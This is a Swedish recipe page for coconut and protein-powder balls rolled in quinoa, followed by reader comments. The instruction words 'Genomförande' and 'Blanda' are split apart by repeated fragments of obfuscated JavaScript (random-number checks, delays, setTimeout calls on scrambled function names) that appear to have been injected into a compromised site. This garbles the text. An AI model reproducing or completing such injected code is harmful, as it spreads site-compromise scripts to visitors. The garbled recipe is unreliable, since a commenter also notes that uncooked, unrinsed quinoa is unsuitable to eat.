Proteinbollar med Quinoa
2013-06-01- Yield : 10
- Servings : 10
- Prep Time : 5m
- Cook Time : 35m
- Ready In : 40m
Ingredienser
• 2 dl Riven Kokos
• 1/2 dl Fiberhavregryn
• 1,5 skopa Chokladproteinpulver
(Recovery Fitnessguru)
• 2 msk Kokosolja
• Salt & Kanel
Genomförandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e
Steg 1
Blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a alla torrvaror i en skål
Tillsätt Kokosoljan
Lite salt & kanel
Steg 2
Forma till bollar & rulla dem i Quinoa
Låt stå i kylen i ca 30 min
innan servering
Medlemsbetyg
(5 / 5)
4 people rated this recipe
posted by Katrine on 21/06/2013
Hej… Måste bara påpeka, att osköljd qinoua inte är bra att äta (innehåller en syra som ska sköljas bort), och okokt qinoua sväller i magen…
Då jag gör qinouabollar har jag kokt qinoua i bollarna istället för havregryn, då blir de dessutom glutenfria sen rullar jag dem i kokos…
Ja det var bara något jag kom på…
posted by Henrik Grunden on 24/06/2013
Tack Katrine, vi uppskattar din synpunkt! Vi ska se till att ändra receptet!